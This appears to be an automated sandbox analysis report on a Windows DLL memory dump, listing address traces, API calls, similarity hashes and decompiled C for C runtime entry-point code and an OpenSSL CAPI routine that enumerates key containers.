0x6e53eb2c
0x6e53eb32
0x6e53eba2
0x6e53eba2
0x00000000
0x6e53eb34
0x6e53eb34
0x6e53eb8b
0x6e53eb8b
0x6e53eb8f
0x00000000
0x00000000
0x6e53eb39
0x6e53eb3b
0x6e53eb3e
0x6e53eb3e
0x6e53eb40
0x6e53eb41
0x6e53eb47
0x6e53eb4a
0x6e53eb50
0x6e53eb89
0x6e53eb89
0x00000000
0x6e53eb52
0x6e53eb55
0x6e53eb5a
0x6e53eb60
0x6e53eb93
0x6e53eb94
0x6e53eb9b
0x00000000
0x6e53eb62
0x6e53eb67
0x6e53eb6c
0x6e53eb71
0x6e53ebb5
0x6e53ebb6
0x6e53ebb7
0x6e53ebb8
0x6e53ebb9
0x6e53ebba
0x6e53ebbf
0x6e53ebc3
0x6e53ebc5
0x6e53ebc8
0x6e53ebc9
0x6e53ebce
0x6e53ebd1
0x6e53ebd3
0x6e53ebd4
0x6e53ebd5
0x6e53ebd8
0x6e53ebdd
0x6e53ebe1
0x6e53ebe3
0x6e53ebe4
0x6e53ebe7
0x6e53ebe9
0x6e53ebe9
0x6e53ebea
0x6e53ebec
0x6e53ebec
0x6e53ebef
0x6e53ebef
0x6e53ebf2
0x6e53ebf5
0x6e53ec02
0x6e53ec05
0x6e53ec08
0x6e53ec0a
0x6e53ec0f
0x6e53ec0f
0x6e53ec12
0x6e53ec1d
0x6e53ec23
0x6e53ecb0
0x6e53ecb3
0x6e53ecbf
0x6e53ec29
0x6e53ec29
0x6e53ec2c
0x6e53ec32
0x6e53ec34
0x6e53ec36
0x6e53ec36
0x6e53ec38
0x6e53ec38
0x6e53ec3b
0x6e53ec3b
0x6e53ec3e
0x6e53ec41
0x6e53ec49
0x6e53ec4d
0x6e53ec4d
0x6e53ec50
0x6e53ec51
0x6e53ec57
0x00000000
0x6e53ec59
0x6e53ec61
0x6e53ec67
0x6e53eca0
0x6e53eca1
0x6e53eca6
0x6e53eca9
0x00000000
0x6e53ec69
0x6e53ec6e
0x6e53ec73
0x6e53ec78
0x6e53ecc2
0x6e53ecc3
0x6e53ecc4
0x6e53ecc5
0x6e53ecc6
0x6e53ecc7
0x6e53eccc
0x6e53eccf
0x6e53ecd2
0x6e53ecd3
0x6e53ecd8
0x6e53ecda
0x6e53ecdc
0x6e53ecdd
0x6e53eced
0x6e53ece2
0x6e53ece7
0x6e53ecea
0x6e53ecec
0x6e53ecf2
0x6e53ecf8
0x6e53ecfb
0x6e53ec7a
0x6e53ec7a
0x6e53ec7d
0x6e53ec82
0x6e53ec88
0x6e53ec8d
0x00000000
0x6e53ec90
0x6e53ec78
0x6e53ec67
0x00000000
0x6e53ec91
0x6e53ec91
0x6e53ec94
0x6e53ec97
0x6e53ec99
0x6e53ec9e
0x00000000
0x6e53ec32
0x6e53eb73
0x6e53eb73
0x6e53eb78
0x6e53eb7d
0x6e53eb80
0x6e53eb85
0x00000000
0x6e53eb88
0x6e53eb71
0x6e53eb60
0x00000000
0x6e53eb50
0x6e53eba4
0x6e53eba6
0x6e53ebb2
0x6e53ebb2
0x00000000

APIs

_free.LIBCMT ref: 6E53EB80
_free.LIBCMT ref: 6E53EB9B
_free.LIBCMT ref: 6E53EBA6
_free.LIBCMT ref: 6E53ECB3

Part of subcall function 6E544550: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E54127A,00000001,00000364,00000008,000000FF,?,6E537E74,6E5342C8,6E684440,00000010,6E534479,?), ref: 6E544591

_free.LIBCMT ref: 6E53EC88

Part of subcall function 6E541B83: HeapFree.KERNEL32(00000000,00000000,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF), ref: 6E541B99
Part of subcall function 6E541B83: GetLastError.KERNEL32(6E4F6ECF,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF,6E4F6ECF), ref: 6E541BAB

_free.LIBCMT ref: 6E53ECA9

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Heap$AllocateErrorFreeLast
String ID:
API String ID: 4150789928-0
Opcode ID: acff9dcf17d18b45591aedc104b3a073dbe59886bd177d098fc39f557311cc22
Instruction ID: 638508b6af78019cec32b282cf1ef5a8a27fade883fb03bb1753b070cd3df8ec
Opcode Fuzzy Hash: acff9dcf17d18b45591aedc104b3a073dbe59886bd177d098fc39f557311cc22
Instruction Fuzzy Hash: C2516B36A083259BDB058FE89861BFE77F9DF84724B30045AEA459B244FE31ED028290

Uniqueness

Uniqueness Score: -1.00%

Function 6E52F4AC, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6E52F4AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6e684240);
				E6E530370(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6E52F5B7( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6E52F2A2(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t45 = E6E4F6E30( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6E4F6E30( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6E52F3FC(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6E52F5B7( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6E52F2A2(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6E52F5B7( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6e68b030 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6e52f4ac
0x6e52f4ac
0x6e52f4ae
0x6e52f4b3
0x6e52f4b8
0x6e52f4bd
0x6e52f4ce
0x6e52f4ce
0x6e52f4d2
0x6e52f4d5
0x6e52f4e1
0x6e52f4e1
0x6e52f4ee
0x6e52f4f0
0x6e52f4f3
0x6e52f4f5
0x6e52f59e
0x6e52f59e
0x6e52f5a5
0x6e52f5a7
0x6e52f5aa
0x6e52f5b6
0x6e52f5b6
0x6e52f500
0x6e52f505
0x6e52f507
0x6e52f50a
0x6e52f50c
0x00000000
0x00000000
0x6e52f512
0x6e52f512
0x6e52f51c
0x6e52f51e
0x6e52f521
0x6e52f524
0x6e52f526
0x6e52f528
0x6e52f52a
0x6e52f52f
0x6e52f534
0x6e52f536
0x6e52f536
0x6e52f53c
0x6e52f53d
0x6e52f542
0x6e52f548
0x6e52f548
0x6e52f528
0x6e52f54d
0x6e52f54f
0x6e52f556
0x6e52f560
0x6e52f562
0x6e52f565
0x6e52f567
0x6e52f573
0x6e52f59b
0x6e52f59b
0x00000000
0x6e52f551
0x6e52f551
0x6e52f554
0x00000000
0x00000000
0x00000000
0x6e52f554
0x6e52f54f
0x6e52f4d7
0x6e52f4da
0x00000000
0x00000000
0x6e52f4dc
0x00000000
0x6e52f4dc
0x6e52f4bf
0x6e52f4c5
0x00000000
0x00000000
0x6e52f4c7
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6E52F4E9
dllmain_crt_dispatch.LIBCMT ref: 6E52F500
dllmain_raw.LIBCMT ref: 6E52F548
dllmain_crt_dispatch.LIBCMT ref: 6E52F55B
dllmain_raw.LIBCMT ref: 6E52F56E

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 5a544562cde6722c956c61d683beefcdb19053c77b36b942ace218fe9d63a35b
Instruction ID: cc7c1a90d6e25e9a603354362a049c921ed5746e96a72fa7b1bac9ab35e5df77
Opcode Fuzzy Hash: 5a544562cde6722c956c61d683beefcdb19053c77b36b942ace218fe9d63a35b
Instruction Fuzzy Hash: 18216072E10619AFDB618EE5E940EAF3AA9FB85B94F214535F81877294D3308D418BF0

Uniqueness

Uniqueness Score: -1.00%

Function 6E52D6CA, Relevance: 6.0, APIs: 4, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 6E52D6E4

Part of subcall function 6E52D58C: __Xtime_get_ticks.LIBCPMT ref: 6E52D5A3
Part of subcall function 6E52D58C: __aulldvrm.LIBCMT ref: 6E52D5B2

__Xtime_diff_to_millis2.LIBCPMT ref: 6E52D6F0
Sleep.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,-00001200,?,00000000,6E4F719D,info,00000004), ref: 6E52D6F8
_xtime_get.LIBCPMT ref: 6E52D704

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _xtime_get$SleepXtime_diff_to_millis2Xtime_get_ticks__aulldvrm
String ID:
API String ID: 3804602159-0
Opcode ID: fc4e2c3c7065e55d21b1d687c8421526c93779b946c509b15859dc6f4a6e4708
Instruction ID: 84ac108651b9c174d1ca38a8901d49b2795c6bebbe3ceab985c620ae7fd8a1a5
Opcode Fuzzy Hash: fc4e2c3c7065e55d21b1d687c8421526c93779b946c509b15859dc6f4a6e4708
Instruction Fuzzy Hash: 22011E31A0560A9FDF14DBE4D5859EEB3F8EF45318B20082AE506A75C0DB74BE44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6E54B37D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E54B3E0

Strings

Tn, xrefs: 6E54B37F

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: Tn
API String ID: 269201875-1347677942
Opcode ID: 68360b59aabea6db878454ad9156ed49a9a19b1bf1c6888a6c76f5921ce082f0
Instruction ID: b5a24fb60564e7a7433dc35077ed342b028c6668b89b14d9594222aa4ba28724
Opcode Fuzzy Hash: 68360b59aabea6db878454ad9156ed49a9a19b1bf1c6888a6c76f5921ce082f0
Instruction Fuzzy Hash: 35012C72C00159EFCF41AFE88C01AEE7FF9AF48354F144565EA24A2165E7318A209B91

Uniqueness

Uniqueness Score: -1.00%

Function 6E52F2F5, Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6E52F342

Part of subcall function 6E5301B2: InitializeSListHead.KERNEL32(6E68B3B0,6E52F34C,6E6841F8,00000010,6E52F2DD,?,?,?,6E52F505,?,00000001,?,?,00000001,?,6E684240), ref: 6E5301B7

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E52F3AC

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: c3f26204867df06e4e7d77673d4ccc79c1c9c3d82ff86530018db3dece4deb39
Instruction ID: cb20af83bc41ed53500e3a64c0842f081af7b715d2a1aeae1356ec2a45224f0e
Opcode Fuzzy Hash: c3f26204867df06e4e7d77673d4ccc79c1c9c3d82ff86530018db3dece4deb39
Instruction Fuzzy Hash: BA2105365883119ECF416BF4F8107ED37E86F6A32CF30486AD6507B2C2EB650840D676

Uniqueness

Uniqueness Score: -1.00%

Function 6E52EFB6, Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(6E4F7CE1,?,6E52E857,6E52E89D,?,6E52E6E4,00000000,00000000,00000000,00000004,6E4F7CE1,00000001,?,ios_base::failbit set), ref: 6E52EFC9
IsProcessorFeaturePresent.KERNEL32(00000017,6E541194,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000,8304488B,?,?,00000000), ref: 6E5349DC

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodeFeaturePointerPresentProcessor
String ID:
API String ID: 4030241255-0
Opcode ID: 23e30bb1a1e203ac2f398af18f86c0555e2916715b1f88734029bfc1eee4ce22
Instruction ID: b2f47c6652ad8f5d96166ae8caabb49a0a0902200b9a48bb1f1b3cc80a5206ad
Opcode Fuzzy Hash: 23e30bb1a1e203ac2f398af18f86c0555e2916715b1f88734029bfc1eee4ce22
Instruction Fuzzy Hash: C7F0E0751C8605FAFF111BE7D9667A737E99B43708F500019A704556D1FF724492C760

Uniqueness

Uniqueness Score: -1.00%

Function 6E5409A9, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 6E5409E3

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 287f7c2343b643c54bab1d06de031ea80477c085197424bb5ff967bfaa3472b3
Instruction ID: b9959babcc53af3bf423c9680a9ed320c65ad71afb433e0503d2b9ab14ee8a2a
Opcode Fuzzy Hash: 287f7c2343b643c54bab1d06de031ea80477c085197424bb5ff967bfaa3472b3
Instruction Fuzzy Hash: C4111871A0410AAFCF05DF99E9419DF7BF8EF49304F10446AF805AB351E630E911CB65

Uniqueness

Uniqueness Score: -1.00%

Function 6E544550, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E54127A,00000001,00000364,00000008,000000FF,?,6E537E74,6E5342C8,6E684440,00000010,6E534479,?), ref: 6E544591

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6a621201b3f1abff3bcd0bac5afc9b8a225f2724ff7833fc4096f4e56a4f6f93
Instruction ID: ce081feb550afe337667467ab6559080413f44130ea9993fb9b5575bed689244
Opcode Fuzzy Hash: 6a621201b3f1abff3bcd0bac5afc9b8a225f2724ff7833fc4096f4e56a4f6f93
Instruction Fuzzy Hash: E0F0B4315C4625E7AF415EEA8805AEF37DCAB86760F158512E818D6188CB20DC0686A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E54B0C4, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,6E54B4B4,?,?,00000000,?,6E54B4B4,00000000,0000000C), ref: 6E54B0E1

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 86a73e2ab6a840caf9592048c4e6db57441c2a06c624d706a2b1322c80a178b7
Instruction ID: eecc9c6cc3a7d0443752c1256c79d79bab3b73ea54b2a5af778d8246a66abb53
Opcode Fuzzy Hash: 86a73e2ab6a840caf9592048c4e6db57441c2a06c624d706a2b1322c80a178b7
Instruction Fuzzy Hash: 67D06C3605020DBBDF028E89DC06EDA3BAAFB48714F014000BA1856120C732E822EB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E586950, Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 261
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E6E586950(void* __ebx, void* __ecx, void* __edi, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				signed int _v24;
				int _v28;
				long* _v32;
				int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v56;
				void* __esi;
				void* __ebp;
				signed int _t47;
				char* _t51;
				signed int _t52;
				signed int _t53;
				signed int _t55;
				signed int _t59;
				intOrPtr _t98;
				signed int _t100;
				intOrPtr _t102;
				void* _t104;
				short* _t111;
				signed int _t112;
				signed int _t116;
				long _t117;
				void* _t118;
				void* _t119;
				int _t120;
				signed int _t121;
				void* _t122;
				short* _t123;
				short* _t124;
				short* _t127;

				_t138 = __fp0;
				_t104 = __ecx;
				E6E52F9A0();
				_t47 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t47 ^ _t121;
				_t98 = _a4;
				_v40 = _t98;
				_t111 = 0;
				_push( *((intOrPtr*)(_t98 + 0x10)));
				_v44 = _a8;
				_v36 = 1;
				_v24 = 0;
				E6E584870(_t98, _t121, __fp0, _t98, "Listing containers CSP=%s, type = %d\n",  *(_t98 + 0xc));
				_t51 =  *(_t98 + 0xc);
				_t123 = _t122 + 0x10;
				if(_t51 == 0) {
					L8:
					_t52 =  &_v32;
					__imp__CryptAcquireContextW(_t52, 0, _t111,  *((intOrPtr*)(_t98 + 0x10)), 0xf0000000);
					__eflags = _t52;
					if(_t52 != 0) {
						_t53 =  &_v24;
						__imp__CryptGetProvParam(_v32, 2, 0, _t53, 1);
						__eflags = _t53;
						if(_t53 != 0) {
							E6E584870(_t98, _t121, _t138, _t98, "Got max container len %d\n", _v24);
							_t55 = _v24;
							__eflags = _t55;
							_push(0x4d1);
							_t56 =  ==  ? 0x400 : _t55;
							_push("engines\\e_capi.c");
							_v24 =  ==  ? 0x400 : _t55;
							_t112 = E6E55C790( ==  ? 0x400 : _t55);
							_t124 =  &(_t123[0xc]);
							__eflags = _t112;
							if(_t112 != 0) {
								_t116 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _t116;
									_v28 = _v24;
									_t59 =  &_v28;
									 *_t112 = 0;
									_t100 = 0 | _t116 == 0x00000000;
									__imp__CryptGetProvParam(_v32, 2, _t112, _t59, _t100);
									__eflags = _t59;
									if(_t59 == 0) {
										break;
									}
									_push(_t100);
									_t102 = _v40;
									_push(_t116);
									_push(_v28);
									E6E584870(_t102, _t121, _t138, _t102, "Container name %s, len=%d, index=%d, flags=%d\n", _t112);
									_t127 =  &(_t124[0xc]);
									__eflags =  *_t112;
									if(__eflags != 0) {
										L24:
										_push(_t112);
										_push(_t116);
										_push("%lu. %s\n");
										_push(_v44);
										E6E55CA80(_t112, _t116, __eflags, _t138);
										_t124 =  &(_t127[8]);
										_t116 = _t116 + 1;
										continue;
									} else {
										__eflags = _v28 - _v24;
										if(__eflags == 0) {
											_push("Enumerate bug: using workaround\n");
											_push(_t102);
											E6E584870(_t102, _t121, _t138);
											_t124 =  &(_t127[4]);
										} else {
											goto L24;
										}
									}
									goto L31;
								}
								_t117 = GetLastError();
								__eflags = _t117 - 0x103;
								if(_t117 != 0x103) {
									_t65 =  *0x6e68e398;
									__eflags =  *0x6e68e398;
									if(__eflags == 0) {
										 *0x6e68e398 = E6E552AE0(0x400);
									}
									E6E552F50(_t100, 0x400, _t121, __eflags, _t65, 0x6b, 0x6c, "engines\\e_capi.c", 0x4e4);
									_push(_t117);
									_push("%lX");
									_push(0xa);
									_push( &_v20);
									E6E55CB70(__eflags);
									_push( &_v20);
									_push("Error code= 0x");
									_push(2);
									E6E5525B0();
									_t124 =  &(_t124[0x18]);
									goto L30;
								}
							} else {
								_t75 =  *0x6e68e398;
								__eflags =  *0x6e68e398;
								if(__eflags == 0) {
									 *0x6e68e398 = E6E552AE0(0x400);
								}
								E6E552F50(_t98, 0x400, _t121, __eflags, _t75, 0x6b, 0x41, "engines\\e_capi.c", 0x4d3);
								_t124 =  &(_t124[0xa]);
								L30:
								_v36 = 0;
							}
							L31:
							_push(0x4f5);
							_push("engines\\e_capi.c");
							E6E55C7C0(_t112);
							CryptReleaseContext(_v32, 0);
							_pop(_t118);
							__eflags = _v8 ^ _t121;
							return E6E52F227(_v8 ^ _t121, _t118);
						} else {
							_t77 =  *0x6e68e398;
							__eflags =  *0x6e68e398;
							if(__eflags == 0) {
								 *0x6e68e398 = E6E552AE0(_t104);
							}
							E6E552F50(_t98, _t104, _t121, __eflags, _t77, 0x6b, 0x6c, "engines\\e_capi.c", 0x4c9);
							_push(GetLastError());
							_push("%lX");
							_push(0xa);
							_push( &_v20);
							E6E55CB70(__eflags);
							_push( &_v20);
							_push("Error code= 0x");
							_push(2);
							E6E5525B0();
							CryptReleaseContext(_v32, 0);
							goto L7;
						}
					} else {
						_t87 =  *0x6e68e398;
						__eflags =  *0x6e68e398;
						if(__eflags == 0) {
							 *0x6e68e398 = E6E552AE0(_t104);
						}
						_push(0x4c3);
						_push("engines\\e_capi.c");
						_push(0x68);
						goto L6;
					}
				} else {
					_t120 = MultiByteToWideChar(0, 0, _t51, 0xffffffff, 0, 0);
					_v28 = _t120;
					if(_t120 == 0) {
						L3:
						_t87 =  *0x6e68e398;
						_t136 = _t87;
						if(_t87 == 0) {
							 *0x6e68e398 = E6E552AE0(_t104);
						}
						_push(0x4bb);
						_push("engines\\e_capi.c");
						_push(0x41);
						L6:
						_push(0x6b);
						E6E552F50(_t98, _t104, _t121, _t136);
						E6E55CB70(_t136,  &_v20, 0xa, "%lX", GetLastError(), _t87);
						_push( &_v20);
						_push("Error code= 0x");
						_push(2);
						E6E5525B0();
						L7:
						_pop(_t119);
						return E6E52F227(_v8 ^ _t121, _t119);
					} else {
						E6E530020();
						_t111 = _t123;
						MultiByteToWideChar(0, 0,  *(_t98 + 0xc), 0xffffffff, _t111, _t120);
						if(_t111 != 0) {
							goto L8;
						} else {
							goto L3;
						}
					}
				}
			}

0x6e586950
0x6e586950
0x6e586958
0x6e58695d
0x6e586964
0x6e58696b
0x6e586970
0x6e586973
0x6e586975
0x6e586978
0x6e58697e
0x6e58698b
0x6e586992
0x6e586997
0x6e58699a
0x6e58699f
0x6e586a44
0x6e586a4c
0x6e586a53
0x6e586a59
0x6e586a5b
0x6e586a83
0x6e586a8e
0x6e586a94
0x6e586a96
0x6e586b05
0x6e586b0a
0x6e586b12
0x6e586b14
0x6e586b19
0x6e586b1c
0x6e586b22
0x6e586b2a
0x6e586b2c
0x6e586b2f
0x6e586b31
0x6e586b62
0x6e586b62
0x6e586b64
0x6e586b69
0x6e586b6b
0x6e586b6e
0x6e586b71
0x6e586b74
0x6e586b7f
0x6e586b85
0x6e586b87
0x00000000
0x00000000
0x6e586b89
0x6e586b8a
0x6e586b8d
0x6e586b8e
0x6e586b98
0x6e586b9d
0x6e586ba0
0x6e586ba3
0x6e586bad
0x6e586bad
0x6e586bae
0x6e586baf
0x6e586bb4
0x6e586bb7
0x6e586bbc
0x6e586bbf
0x00000000
0x6e586ba5
0x6e586ba8
0x6e586bab
0x6e586bc2
0x6e586bc7
0x6e586bc8
0x6e586bcd
0x00000000
0x00000000
0x00000000
0x6e586bab
0x00000000
0x6e586ba3
0x6e586bd8
0x6e586bda
0x6e586be0
0x6e586be2
0x6e586be7
0x6e586be9
0x6e586bf0
0x6e586bf0
0x6e586c04
0x6e586c09
0x6e586c0a
0x6e586c12
0x6e586c14
0x6e586c15
0x6e586c1d
0x6e586c1e
0x6e586c23
0x6e586c25
0x6e586c2a
0x00000000
0x6e586c2a
0x6e586b33
0x6e586b33
0x6e586b38
0x6e586b3a
0x6e586b41
0x6e586b41
0x6e586b55
0x6e586b5a
0x6e586c2d
0x6e586c2d
0x6e586c2d
0x6e586c34
0x6e586c34
0x6e586c39
0x6e586c3f
0x6e586c4c
0x6e586c59
0x6e586c5e
0x6e586c68
0x6e586a98
0x6e586a98
0x6e586a9d
0x6e586a9f
0x6e586aa6
0x6e586aa6
0x6e586aba
0x6e586ac8
0x6e586ac9
0x6e586ad1
0x6e586ad3
0x6e586ad4
0x6e586adc
0x6e586add
0x6e586ae2
0x6e586ae4
0x6e586af1
0x00000000
0x6e586af1
0x6e586a5d
0x6e586a5d
0x6e586a62
0x6e586a64
0x6e586a6b
0x6e586a6b
0x6e586a70
0x6e586a75
0x6e586a7a
0x00000000
0x6e586a7a
0x6e5869a5
0x6e5869b2
0x6e5869b4
0x6e5869b9
0x6e5869da
0x6e5869da
0x6e5869df
0x6e5869e1
0x6e5869e8
0x6e5869e8
0x6e5869ed
0x6e5869f2
0x6e5869f7
0x6e5869f9
0x6e5869f9
0x6e5869fc
0x6e586a16
0x6e586a1e
0x6e586a1f
0x6e586a24
0x6e586a26
0x6e586a2e
